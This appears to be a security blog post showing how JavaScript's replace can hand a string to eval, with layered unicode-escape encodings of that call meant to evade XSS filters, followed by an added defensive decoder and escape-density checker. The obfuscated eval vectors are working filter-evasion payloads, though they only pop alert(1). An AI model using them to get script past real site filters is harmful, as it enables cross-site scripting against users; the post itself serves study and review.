I’ve known for a while that the replace function can call native functions in Firefox and IE. It works something like this:-

'alert(1)'.replace(/.+/,eval)

The regular expression matches the whole string, and replace hands the matched text, alert(1), to the eval function as its first argument. But does it stop there? Well no, actually. There’s more. We can use unicode escapes to encode the string further, like so:-

'\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029'.replace(/\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)

Remember that JavaScript string literals and regular expressions both accept unicode escapes. This is interesting because we can double encode the vector, as above: the string contains JavaScript unicode escapes, double encoded, and the regular expression contains that same string, encoded. So that’s gotta be it, right? C’mon, it’s my blog, I wouldn’t just leave it there…

\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029')[-1].\u0072\u0065\u0070\u006c\u0061\u0063\u0065(\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0035\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0032\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0034\u005c\u0075\u0030\u0030\u0032\u0038\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0032\u0039'),\u0065\u0076\u0061\u006c)

The above uses RegExp and eval, both written as unicode escapes. Because the RegExp constructor is used, we can pass a string that JavaScript decodes once and then encode it again as unicode escapes inside the regular expression. [-1] gives the text that was passed to the regular expression constructor; that is the string we call replace on.

Having trouble decoding? Well Hackvertor can help:-

http://tinyurl.com/hackvertor
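As an added example, not code from the original post, the following JavaScript shows the two mechanics the post relies on from the reviewer’s side: what replace actually hands to a function replacer, and how to peel layered \uXXXX escapes offline (an alternative to pasting into Hackvertor) and measure how much of a string is made up of them. The function names and the sample constants are this example’s own; the two sample strings are fragments copied from the post’s vectors.

```javascript
// Added example, not code from the original post: an offline decoder for
// layered \uXXXX escapes, so a reviewer can see what a vector like the ones
// above reduces to without executing it, plus a probe that records exactly
// what String.prototype.replace hands to a function replacer.
// All function names and the sample inputs below are this example's own.

// Decode one layer of \uXXXX escapes (the BMP form used in the post).
// replace() with a function replacer does not rescan its own output, so
// a decoded backslash cannot recombine with following characters in the
// same pass; each layer is peeled separately.
function unescapeUnicodeOnce(text) {
  return text.replace(/\\u([0-9a-fA-F]{4})/g, (match, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Peel layers until the text stops changing, capped so a pathological
// input cannot loop forever. Returns the plain text and the layer count.
function unescapeUnicodeFully(text, maxLayers = 8) {
  let current = text;
  for (let layers = 0; layers < maxLayers; layers++) {
    const next = unescapeUnicodeOnce(current);
    if (next === current) return { text: current, layers };
    current = next;
  }
  return { text: current, layers: maxLayers };
}

// Fraction of the input taken up by \uXXXX sequences. Legitimate source
// rarely escapes every character; a density near 1.0 is worth a look.
function escapeDensity(text) {
  if (text.length === 0) return 0;
  const escaped = text.match(/\\u[0-9a-fA-F]{4}/g) || [];
  return (escaped.length * 6) / text.length;
}

// Probe what replace() passes to a function replacer. The replacer returns
// the match unchanged, so the subject is not modified; it only observes
// the argument list: (match, ...captureGroups, offset, wholeString).
function captureReplacerArgs(subject, pattern) {
  const calls = [];
  subject.replace(pattern, (...args) => {
    calls.push(args);
    return args[0];
  });
  return calls;
}

// Constructed samples. The first is the body of the single-encoded string
// literal from the post; the second is the inner RegExp argument that the
// post's final vector uses for the letter "a" (two layers deep).
const SAMPLE_SINGLE = "\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029";
const SAMPLE_DOUBLE = "\\u005c\\u0075\\u0030\\u0030\\u0036\\u0031";

// Run stand-alone: node this_file.js
if (typeof require !== "undefined" && require.main === module) {
  console.log(unescapeUnicodeFully(SAMPLE_SINGLE)); // { text: 'alert(1)', layers: 1 }
  console.log(unescapeUnicodeFully(SAMPLE_DOUBLE)); // { text: 'a', layers: 2 }
  console.log(escapeDensity(SAMPLE_SINGLE).toFixed(2)); // 1.00
  console.log(captureReplacerArgs("alert(1)", /.+/)); // [ [ 'alert(1)', 0, 'alert(1)' ] ]
}
```

The probe makes the first trick concrete: with a pattern that matches the whole subject and no capture groups, the replacer’s first argument is the entire string, which is exactly what eval receives in the post’s one-liner. The decoder shows why a single unescape pass is not enough when reviewing input: the inner RegExp argument only becomes readable after two layers.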